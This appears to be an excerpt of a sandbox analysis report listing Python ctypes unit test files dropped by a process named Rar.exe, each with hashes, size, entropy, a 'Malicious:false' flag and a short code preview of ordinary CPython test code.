                                                                                                                                                                                                                                  SSDEEP:48:zg6QNR3wJdAeKlBzO74JoJCIv4JonW8gQ/A:zg6aVwQ7lB5IQ0DA
                                                                                                                                                                                                                                  MD5:8E090D286F89A4227E0C674019C4420C
                                                                                                                                                                                                                                  SHA1:B47592B803064AD30926B18EF1202DFC9F581279
                                                                                                                                                                                                                                  SHA-256:1418BD67F4644C62B171EBC69E3C9C49A59955024303F7EA82C4A53BAFD90AA9
                                                                                                                                                                                                                                  SHA-512:8643D9E7D5AB27063628B14D3826CF2FC89AAA12472FF6E2D7BCD2455FA87B8F8DB0E7B54C55B62F07955BA52046D0E1460FD24E7DA7BB5519319347E6D6EC10
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:from ctypes import *..from ctypes.test import need_symbol..import unittest....class StringBufferTestCase(unittest.TestCase):.... def test_buffer(self):.. b = create_string_buffer(32).. self.assertEqual(len(b), 32).. self.assertEqual(sizeof(b), 32 * sizeof(c_char)).. self.assertIs(type(b[0]), bytes).... b = create_string_buffer(b"abc").. self.assertEqual(len(b), 4) # trailing nul char.. self.assertEqual(sizeof(b), 4 * sizeof(c_char)).. self.assertIs(type(b[0]), bytes).. self.assertEqual(b[0], b"a").. self.assertEqual(b[:], b"abc\0").. self.assertEqual(b[::], b"abc\0").. self.assertEqual(b[::-1], b"\0cba").. self.assertEqual(b[::2], b"ac").. self.assertEqual(b[::5], b"a").... self.assertRaises(TypeError, create_string_buffer, "abc").... def test_buffer_interface(self):.. self.assertEqual(len(bytearray(create_string_buffer(0))), 0).. self.assertEqual(len(bytearray(c
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2053
                                                                                                                                                                                                                                  Entropy (8bit):4.57704821148396
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:3F50kasMCPZhhRZzz57zhSvhbaYd5Xbj6OUb+bj6e2SJBJJ48aa1:3FPdJyqb+fJBj4na1
                                                                                                                                                                                                                                  MD5:2A38D98F71B4A58FC9B35908E4A99C00
                                                                                                                                                                                                                                  SHA1:A914FBA375BCB038F93E61A7E34FA688F751D90E
                                                                                                                                                                                                                                  SHA-256:27834A2AF2ABA22100F23859133B8F831CF1B2F18CFBC93AA9362A55441EB7B7
                                                                                                                                                                                                                                  SHA-512:EAC769E82BE7303245C75A190B75D56A8C14546F56B4D45880A5B5840D1F3DCD441C5FE1639EDE9C05B354DAE33D3780DBE890A299A0EC06735AFC511FB7A137
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Test where byte objects are accepted"""..import unittest..import sys..from ctypes import *....class BytesTest(unittest.TestCase):.. def test_c_char(self):.. x = c_char(b"x").. self.assertRaises(TypeError, c_char, "x").. x.value = b"y".. with self.assertRaises(TypeError):.. x.value = "y".. c_char.from_param(b"x").. self.assertRaises(TypeError, c_char.from_param, "x").. self.assertIn('xbd', repr(c_char.from_param(b"\xbd"))).. (c_char * 3)(b"a", b"b", b"c").. self.assertRaises(TypeError, c_char * 3, "a", "b", "c").... def test_c_wchar(self):.. x = c_wchar("x").. self.assertRaises(TypeError, c_wchar, b"x").. x.value = "y".. with self.assertRaises(TypeError):.. x.value = b"y".. c_wchar.from_param("x").. self.assertRaises(TypeError, c_wchar.from_param, b"x").. (c_wchar * 3)("a", "b", "c").. self.assertRaises(TypeError, c_wchar * 3, b"a", b"b",
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11726
                                                                                                                                                                                                                                  Entropy (8bit):4.645924708918119
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:kMw0r5LAAxiDxi1Ki3EHwn8Dqr/runjbCUBHIehzESdhfKjRWXG6S1yl+A:kM/rSAI4Ki3EHwn8Dqz0bCUBHIehzESJ
                                                                                                                                                                                                                                  MD5:0EE8372AACEF4A068D4E54D05D853077
                                                                                                                                                                                                                                  SHA1:83FC5B36A0695B5047B22A1BCDD3C621C4424B3D
                                                                                                                                                                                                                                  SHA-256:B08BAE08D658E415778544E079DE8C3B9C5BE1F0752B50D9A8E41EF0C72167B4
                                                                                                                                                                                                                                  SHA-512:DCA212F4878E82A7823E416C86F97B91BDAB577C48A0AC89F58FE2EF68483B731F56900E45953FBEEB94249254131686A8A1EA22549453F43BC2AEDB40B752C5
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import sys, unittest, struct, math, ctypes..from binascii import hexlify....from ctypes import *....def bin(s):.. return hexlify(memoryview(s)).decode().upper()....# Each *simple* type that supports different byte orders has an..# __ctype_be__ attribute that specifies the same type in BIG ENDIAN..# byte order, and a __ctype_le__ attribute that is the same type in..# LITTLE ENDIAN byte order...#..# For Structures and Unions, these types are created on demand.....class Test(unittest.TestCase):.. @unittest.skip('test disabled').. def test_X(self):.. print(sys.byteorder, file=sys.stderr).. for i in range(32):.. bits = BITS().. setattr(bits, "i%s" % i, 1).. dump(bits).... def test_slots(self):.. class BigPoint(BigEndianStructure):.. __slots__ = ().. _fields_ = [("x", c_int), ("y", c_int)].... class LowPoint(LittleEndianStructure):.. __slots__ = ().. _fields_ = [("x", c_int),
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):10898
                                                                                                                                                                                                                                  Entropy (8bit):4.729984414466043
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:goIGHfrrch4GT13ljAJsWhqJ7J8H4FnyUpl1S4iHeVbOmV23iKqDUMv0ryb8qjy:goIsTySes3iKWUS0ry4
                                                                                                                                                                                                                                  MD5:C8E1C51E8AB7F35EC5EF1C2B60086242
                                                                                                                                                                                                                                  SHA1:2F930DC43041F4161C050922022D510DD29D30F6
                                                                                                                                                                                                                                  SHA-256:33B1B43705113FF4D5D1E85F9A835FF3E44D39A7A27B3740D44406D414C164D7
                                                                                                                                                                                                                                  SHA-512:7CCA5C7376FEC9F7129B8C7F34D36C8D8446D306A01CD6C225E721FB9285878B538715AB506D7FCC71B88E5FCD5F84B0DD0AC5E824342E415590478C8D56FE68
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import functools..import unittest..from test import support....from ctypes import *..from ctypes.test import need_symbol..import _ctypes_test....class Callbacks(unittest.TestCase):.. functype = CFUNCTYPE....## def tearDown(self):..## import gc..## gc.collect().... def callback(self, *args):.. self.got_args = args.. return args[-1].... def check_type(self, typ, arg):.. PROTO = self.functype.__func__(typ, typ).. result = PROTO(self.callback)(arg).. if typ == c_float:.. self.assertAlmostEqual(result, arg, places=5).. else:.. self.assertEqual(self.got_args, (arg,)).. self.assertEqual(result, arg).... PROTO = self.functype.__func__(typ, c_byte, typ).. result = PROTO(self.callback)(-3, arg).. if typ == c_float:.. self.assertAlmostEqual(result, arg, places=5).. else:.. self.assertEqual(self.got_args, (-3, arg)).. self.assertEqual(res
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3827
                                                                                                                                                                                                                                  Entropy (8bit):4.6682890460925845
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:zBXtskbhc9HskGsk3BqgOFFfcMCMEHL15mdrh4IChrKyqA:zBXtskbhchskGskFhHL14dNeeNA
                                                                                                                                                                                                                                  MD5:4E21D156BEFD6A87F0194198AE282062
                                                                                                                                                                                                                                  SHA1:217846F5C7967101C82DFC9FF2BBF380933124F8
                                                                                                                                                                                                                                  SHA-256:9A6167790D619DA3031F46C47E1E90673417D615E0E51E2AEFF34025799FB50E
                                                                                                                                                                                                                                  SHA-512:6A954E25851CAACE7C56C920CCA532C864A71D0D07535F8473EFA628E36F66A87FEFC7B03B24EE852B63908C2D792F51E85DDF29170E3789E992F378D337CB03
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:from ctypes import *..from ctypes.test import need_symbol..import unittest..import sys....class Test(unittest.TestCase):.... def test_array2pointer(self):.. array = (c_int * 3)(42, 17, 2).... # casting an array to a pointer works... ptr = cast(array, POINTER(c_int)).. self.assertEqual([ptr[i] for i in range(3)], [42, 17, 2]).... if 2*sizeof(c_short) == sizeof(c_int):.. ptr = cast(array, POINTER(c_short)).. if sys.byteorder == "little":.. self.assertEqual([ptr[i] for i in range(6)],.. [42, 0, 17, 0, 2, 0]).. else:.. self.assertEqual([ptr[i] for i in range(6)],.. [0, 42, 0, 17, 0, 2]).... def test_address2pointer(self):.. array = (c_int * 3)(42, 17, 2).... address = addressof(array).. ptr = cast(c_void_p(address), POINTER(c_int)).. self.assertEqual([ptr[i] for i in range(3)], [42, 17, 2]
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):7892
                                                                                                                                                                                                                                  Entropy (8bit):4.754544482863566
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:zeRwowNZmjZzLNjYyDYyNaxaPYyLYy/zaRbax2/7LAxWXitX1UotHy:ULv1D1v1L1/Ch7Ezez
                                                                                                                                                                                                                                  MD5:AD9026C0E907731CBBFDDB6CF9B54BF7
                                                                                                                                                                                                                                  SHA1:D816EED1B527D4F8B74DEBA92C364C337DCE1526
                                                                                                                                                                                                                                  SHA-256:9A500004FD764FC1E51C7939C70C2A934B9DD5D4AABCC60ACC741C831FEF0C74
                                                                                                                                                                                                                                  SHA-512:01264415C94704B93F50826FC74A0CEB6CC577F1BDBCFBDC8564079131F4121472ED3F48EDBB4235C9AC9AF25FDE67CE446BC5E7132C25EF05D3D53ED9119EB4
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# A lot of failures in these tests on Mac OS X...# Byte order related?....import unittest..from ctypes import *..from ctypes.test import need_symbol....import _ctypes_test....class CFunctions(unittest.TestCase):.. _dll = CDLL(_ctypes_test.__file__).... def S(self):.. return c_longlong.in_dll(self._dll, "last_tf_arg_s").value.. def U(self):.. return c_ulonglong.in_dll(self._dll, "last_tf_arg_u").value.... def test_byte(self):.. self._dll.tf_b.restype = c_byte.. self._dll.tf_b.argtypes = (c_byte,).. self.assertEqual(self._dll.tf_b(-126), -42).. self.assertEqual(self.S(), -126).... def test_byte_plus(self):.. self._dll.tf_bb.restype = c_byte.. self._dll.tf_bb.argtypes = (c_byte, c_byte).. self.assertEqual(self._dll.tf_bb(0, -126), -42).. self.assertEqual(self.S(), -126).... def test_ubyte(self):.. self._dll.tf_B.restype = c_ubyte.. self._dll.tf_B.argtypes = (c_ubyte,).. self.assert
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1004
                                                                                                                                                                                                                                  Entropy (8bit):4.58109088421519
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:ixHCSUGuoduNM3tpF2teU72teZ24bpegF2OH3pe:ixvUGumyMd7YD7Y4pp9r3A
                                                                                                                                                                                                                                  MD5:5B069F0F2470A6FB5FA0DBB841199996
                                                                                                                                                                                                                                  SHA1:8F0D37E7E5E9C28D0337A932C2D45253E2A0760D
                                                                                                                                                                                                                                  SHA-256:D17F4F281CD0B91A041EE760931DDBCC20040CA0136532BFEC19D23A1A74026D
                                                                                                                                                                                                                                  SHA-512:BFCFA7A615C8DFB844E20212A2E8C52D295C0E9BF1DDA9DD9D8EB05F4CDC501CB9603FE04D7C123C4196CFB2A5CCAE3AF1397C6B81B64C12908FF621DB99EF54
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import unittest....from ctypes import *..from ctypes.test import need_symbol....class CHECKED(c_int):.. def _check_retval_(value):.. # Receives a CHECKED instance... return str(value.value).. _check_retval_ = staticmethod(_check_retval_)....class Test(unittest.TestCase):.... def test_checkretval(self):.... import _ctypes_test.. dll = CDLL(_ctypes_test.__file__).. self.assertEqual(42, dll._testfunc_p_p(42)).... dll._testfunc_p_p.restype = CHECKED.. self.assertEqual("42", dll._testfunc_p_p(42)).... dll._testfunc_p_p.restype = None.. self.assertEqual(None, dll._testfunc_p_p(42)).... del dll._testfunc_p_p.restype.. self.assertEqual(42, dll._testfunc_p_p(42)).... @need_symbol('oledll').. def test_oledll(self):.. self.assertRaises(OSError,.. oledll.oleaut32.CreateTypeLib2,.. 0, None, None)....if __name__ == "__main__":.. unittest.main
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):554
                                                                                                                                                                                                                                  Entropy (8bit):4.311608480116657
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:FA1WTipmAlwtsXrzypJNXffqTtlmirzmcXffqTALrzNXffqTXJ9pAjpH2My:FA1/sA0UtlmyUyUXJ9p2pWB
                                                                                                                                                                                                                                  MD5:5DF9815304C86ACE6020573F2C3285F5
                                                                                                                                                                                                                                  SHA1:B0BD39AC1F37248B44CE8816331035A714A7BCF7
                                                                                                                                                                                                                                  SHA-256:06EBC4D5D019BF56D6EB72B2791CF908900DD7E90156B23DD89B21425A25E422
                                                                                                                                                                                                                                  SHA-512:1C0173605DC480EE211A0B1CEDEAE38A68EFDF6037BFE762BABBCF3F6EB6CF784AE9AECAF5D276B400F938675CC6B5A965AAB12FB4C56E55F5DF5708E4D17EAA
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import unittest..from ctypes import *....class X(Structure):.. _fields_ = [("foo", c_int)]....class TestCase(unittest.TestCase):.. def test_simple(self):.. self.assertRaises(TypeError,.. delattr, c_int(42), "value").... def test_chararray(self):.. self.assertRaises(TypeError,.. delattr, (c_char * 5)(), "value").... def test_struct(self):.. self.assertRaises(TypeError,.. delattr, X(), "foo")....if __name__ == "__main__":.. unittest.main()..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2247
                                                                                                                                                                                                                                  Entropy (8bit):4.545545871619444
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:xUx0rv0+eNZeu+6NG5uPJdeSYGdAUpC/A:xUx0r8i5uPtYsuA
                                                                                                                                                                                                                                  MD5:D4DA9B407207F65B8B1F9225D7461117
                                                                                                                                                                                                                                  SHA1:498AD376A84DA85882CCB8A08AAC8C8D1E2BF981
                                                                                                                                                                                                                                  SHA-256:B6816BFCF26A4816C334A2388F02BB66BEC7DB3FEF9ACD34B0A1FCB50B1CF246
                                                                                                                                                                                                                                  SHA-512:FD28AE9C77E11A30E27786F5C0D4A1C679E3C2F879B4C66545236362695F3EE9F0A5139F2F14E5D703DEC06C4D8D88901FA44A79FBFE4E1F99910EF48CB4780A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import unittest, os, errno..import threading....from ctypes import *..from ctypes.util import find_library....class Test(unittest.TestCase):.. def test_open(self):.. libc_name = find_library("c").. if libc_name is None:.. raise unittest.SkipTest("Unable to find C library").. libc = CDLL(libc_name, use_errno=True).. if os.name == "nt":.. libc_open = libc._open.. else:.. libc_open = libc.open.... libc_open.argtypes = c_char_p, c_int.... self.assertEqual(libc_open(b"", 0), -1).. self.assertEqual(get_errno(), errno.ENOENT).... self.assertEqual(set_errno(32), errno.ENOENT).. self.assertEqual(get_errno(), 32).... def _worker():.. set_errno(0).... libc = CDLL(libc_name, use_errno=False).. if os.name == "nt":.. libc_open = libc._open.. else:.. libc_open = libc.open.. libc_open.argtypes = c_char_p, c
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4587
                                                                                                                                                                                                                                  Entropy (8bit):4.518925531699725
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:per5xYuY8getyoigzLeQvcentUvs90OGA:p0fkyDgA
                                                                                                                                                                                                                                  MD5:0F624CD55C1A37E759853C6A20834E24
                                                                                                                                                                                                                                  SHA1:7F1487A6F1198DFC816EAD8C7251303A601F2283
                                                                                                                                                                                                                                  SHA-256:AEB34DA2A1AC8668A6CA966BAD777A3602E865044FE861CDEC57A36DA658C52B
                                                                                                                                                                                                                                  SHA-512:1391880446DADA2484FC051613E04065D52822BF2B9288F34C5BA19326473415BE046B36A12F3BB5B5E6D1BEDFEB203CBF82470C5E23C96EB15454ADDFBB286D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import unittest..import unittest.mock..import os.path..import sys..import test.support..from test.support import os_helper..from ctypes import *..from ctypes.util import find_library....# On some systems, loading the OpenGL libraries needs the RTLD_GLOBAL mode...class Test_OpenGL_libs(unittest.TestCase):.. @classmethod.. def setUpClass(cls):.. lib_gl = lib_glu = lib_gle = None.. if sys.platform == "win32":.. lib_gl = find_library("OpenGL32").. lib_glu = find_library("Glu32").. elif sys.platform == "darwin":.. lib_gl = lib_glu = find_library("OpenGL").. else:.. lib_gl = find_library("GL").. lib_glu = find_library("GLU").. lib_gle = find_library("gle").... ## print, for debugging.. if test.support.verbose:.. print("OpenGL libraries:").. for item in (("GL", lib_gl),.. ("GLU", lib_glu),.. ("gle", lib_gle)):..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5356
                                                                                                                                                                                                                                  Entropy (8bit):4.756710675851968
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:qmDxnGDmApNYLXK7IwyrxcfaWBKyhHc+y:qgtihqUfz/y
                                                                                                                                                                                                                                  MD5:22F30ACE20851D2BA79724E6190F25D7
                                                                                                                                                                                                                                  SHA1:BAA91A2E2FFD1037B751284C17CCA8C407E12A1A
                                                                                                                                                                                                                                  SHA-256:148565036DFCF7BB21CD1C187DDD6D2ACB14B4D464F1989582FCE8B55A6AD6F4
                                                                                                                                                                                                                                  SHA-512:53BA11183C670E365FB4A8A31FFBF3BFBFF4264F64F1BE0D51C9D9BD48F38875387471B8B8ACF086F065AEE02AA840DCFF73784D63D7B2A1EA7351BA6F5EFB46
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:from ctypes import *..import array..import gc..import unittest....class X(Structure):.. _fields_ = [("c_int", c_int)].. init_called = False.. def __init__(self):.. self._init_called = True....class Test(unittest.TestCase):.. def test_from_buffer(self):.. a = array.array("i", range(16)).. x = (c_int * 16).from_buffer(a).... y = X.from_buffer(a).. self.assertEqual(y.c_int, a[0]).. self.assertFalse(y.init_called).... self.assertEqual(x[:], a.tolist()).... a[0], a[-1] = 200, -200.. self.assertEqual(x[:], a.tolist()).... self.assertRaises(BufferError, a.append, 100).. self.assertRaises(BufferError, a.pop).... del x; del y; gc.collect(); gc.collect(); gc.collect().. a.append(100).. a.pop().. x = (c_int * 16).from_buffer(a).... self.assertIn(a, [obj.obj if isinstance(obj, memoryview) else obj.. for obj in x._objects.values()]).... expected
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4158
                                                                                                                                                                                                                                  Entropy (8bit):4.687789117866623
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:F5afXHY2SYwpTZ1buMfJtjCSypVSSNLrNqcDZP10yIDZmNf6SIjicba1:FIfX4P9pTjfJoSySfjVU6SIjicby
                                                                                                                                                                                                                                  MD5:5566EC49D926F6A7E4E064E7C5F9E4A1
                                                                                                                                                                                                                                  SHA1:1DC2D3F9F000A7EDF1816260C291A7D2C0961E34
                                                                                                                                                                                                                                  SHA-256:E9DEB47B1CE3E1D278ED708823EED058BF66EBB2AE9A8F9896BC6E7566DB825F
                                                                                                                                                                                                                                  SHA-512:3AD7EE4BB9070F1F96D81543F19B87187189520E9C48011D29F22974904035AAAAF916F8E3499BC4D400EE65E618FE1ABC82920AAC8B52D27DD1FEC4A367D144
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import unittest..from ctypes import *....try:.. WINFUNCTYPE..except NameError:.. # fake to enable this test on Linux.. WINFUNCTYPE = CFUNCTYPE....import _ctypes_test..lib = CDLL(_ctypes_test.__file__)....class CFuncPtrTestCase(unittest.TestCase):.. def test_basic(self):.. X = WINFUNCTYPE(c_int, c_int, c_int).... def func(*args):.. return len(args).... x = X(func).. self.assertEqual(x.restype, c_int).. self.assertEqual(x.argtypes, (c_int, c_int)).. self.assertEqual(sizeof(x), sizeof(c_voidp)).. self.assertEqual(sizeof(X), sizeof(c_voidp)).... def test_first(self):.. StdCallback = WINFUNCTYPE(c_int, c_int, c_int).. CdeclCallback = CFUNCTYPE(c_int, c_int, c_int).... def func(a, b):.. return a + b.... s = StdCallback(func).. c = CdeclCallback(func).... self.assertEqual(s(1, 2), 3).. self.assertEqual(c(1, 2), 3).. # The following no longer raises a Ty
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):12894
                                                                                                                                                                                                                                  Entropy (8bit):4.677612583904367
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:/UG+YiMzJa56QisKzM+dpLj9UbcRuhMgYflV0P59RqR5TBcy:/UYa56QisKTdpLCaL0P59RqR5TB7
                                                                                                                                                                                                                                  MD5:E13313EA0AEC6CF4640F31DEF31A39E6
                                                                                                                                                                                                                                  SHA1:E63BEF50E4F602B9F12F04AEDFC263D62C0B43A3
                                                                                                                                                                                                                                  SHA-256:F4A08974AE2AD258E36BEBACB530131A956D4F7C2D3263F8D0CB9239F4EB00C4
                                                                                                                                                                                                                                  SHA-512:04F846385FE8D4476F1C9B8C6D57F29245A4310796DE72534E471ED343C96D50C6CBCCD80126E1A4C90F9B55642363A13D4AC2728502E6CD17066F086B697DBC
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""..Here is probably the place to write the docs, since the test-cases..show how the type behave.....Later....."""....from ctypes import *..from ctypes.test import need_symbol..import sys, unittest....try:.. WINFUNCTYPE..except NameError:.. # fake to enable this test on Linux.. WINFUNCTYPE = CFUNCTYPE....import _ctypes_test..dll = CDLL(_ctypes_test.__file__)..if sys.platform == "win32":.. windll = WinDLL(_ctypes_test.__file__)....class POINT(Structure):.. _fields_ = [("x", c_int), ("y", c_int)]..class RECT(Structure):.. _fields_ = [("left", c_int), ("top", c_int),.. ("right", c_int), ("bottom", c_int)]..class FunctionTestCase(unittest.TestCase):.... def test_mro(self):.. # in Python 2.3, this raises TypeError: MRO conflict among bases classes,.. # in Python 2.2 it works... #.. # But in early versions of _ctypes.c, the result of tp_new.. # wasn't checked, and it even crashed Python... # Found by Greg Chapman.
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1065
                                                                                                                                                                                                                                  Entropy (8bit):4.37312551755735
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:FhHBD5HIaXd2SSmonNa89TEKLeDIm40a1:F3D5oDAoTEseDIua1
                                                                                                                                                                                                                                  MD5:70968D92E6FAD1BD97BC47AF51996EE8
                                                                                                                                                                                                                                  SHA1:8BD7519A9D46139AA066C1FF443FD1F8EDA9E543
                                                                                                                                                                                                                                  SHA-256:87E2161447711BF74CBCB30A23CB681B334E6F17228243A5520887803E4676DB
                                                                                                                                                                                                                                  SHA-512:4EC04E6F3771261A5B3152E64C5A903AD1E39D8EE8A0BA315CBA7292D8DF6B4C6205E3BE22DDEE113757924DD679F50F99B78C800D0F9F2F9BB2D19B54F84666
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import unittest..from ctypes import *....################################################################..#..# The incomplete pointer example from the tutorial..#....class MyTestCase(unittest.TestCase):.... def test_incomplete_example(self):.. lpcell = POINTER("cell").. class cell(Structure):.. _fields_ = [("name", c_char_p),.. ("next", lpcell)].... SetPointerType(lpcell, cell).... c1 = cell().. c1.name = b"foo".. c2 = cell().. c2.name = b"bar".... c1.next = pointer(c2).. c2.next = pointer(c1).... p = c1.... result = [].. for i in range(8):.. result.append(p.name).. p = p.next[0].. self.assertEqual(result, [b"foo", b"bar"] * 4).... # to not leak references, we must clean _pointer_type_cache.. from ctypes import _pointer_type_cache.. del _pointer_type_cache[cell]....####################################################
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1079
                                                                                                                                                                                                                                  Entropy (8bit):4.51210279867607
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:1ANIKEJ86K8nAFoqpDd/id1ACuNJE96NRIduynxUO1Fwz8RFQqqVaFIJrqO102pe:1QIKj6EFtJ/kACuHyQDaPN0aFIJvvpe
                                                                                                                                                                                                                                  MD5:27021B00477C506079328D3A5A3F78A9
                                                                                                                                                                                                                                  SHA1:E68D7474FE128AB62010D9485AC4DC48D7DC27D6
                                                                                                                                                                                                                                  SHA-256:9048101E128F49738284A2710D09E8CCBBECD6C775CBFE3A2505D48F20E9EA0E
                                                                                                                                                                                                                                  SHA-512:BE7911F525DB13D184484FE5E7C8F142C89B8DF706C2C0BF037FEF929760B0565227B439B14554142E822973F15C1C502881F2F03997A05C87AE31540DC78E9F
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:from ctypes import *..import unittest....class X(Structure):.. _fields_ = [("a", c_int),.. ("b", c_int)].. new_was_called = False.... def __new__(cls):.. result = super().__new__(cls).. result.new_was_called = True.. return result.... def __init__(self):.. self.a = 9.. self.b = 12....class Y(Structure):.. _fields_ = [("x", X)]......class InitTest(unittest.TestCase):.. def test_get(self):.. # make sure the only accessing a nested structure.. # doesn't call the structure's __new__ and __init__.. y = Y().. self.assertEqual((y.x.a, y.x.b), (0, 0)).. self.assertEqual(y.x.new_was_called, False).... # But explicitly creating an X structure calls __new__ and __init__, of course... x = X().. self.assertEqual((x.a, x.b), (9, 12)).. self.assertEqual(x.new_was_called, True).... y.x = x.. self.assertEqual((y.x.a, y.x.b), (9, 12)).. self.assertEqual(
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2731
                                                                                                                                                                                                                                  Entropy (8bit):4.615319078031669
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:xNxF/j+EHRi3zagJHkaKmfaSOAnTxRFiqJZnooE4w5ca1:xNxV+iRi2gJlxSSOw/iqJQOy
                                                                                                                                                                                                                                  MD5:C2C90A2B68830C1E09EE0D4945DDC4E9
                                                                                                                                                                                                                                  SHA1:4FD1C1D09C87C035E6C8A412AB7F74E288F61E3D
                                                                                                                                                                                                                                  SHA-256:447AFE6FF20B6788B50DA10A309D487BBA68FDC90FB7E57C6ACE2746F86EFE18
                                                                                                                                                                                                                                  SHA-512:14A698EF5514A08D8EC1B8CC0AAAD96DCEF6DFDCFE6BA48436732DF013B9DC7C5392F03C2395B0EE9D0F283AFE8E9B06B6834E3A40D86352D7880F6FA174A1CE
                                                                                                                                                                                                                                  Malicious:false
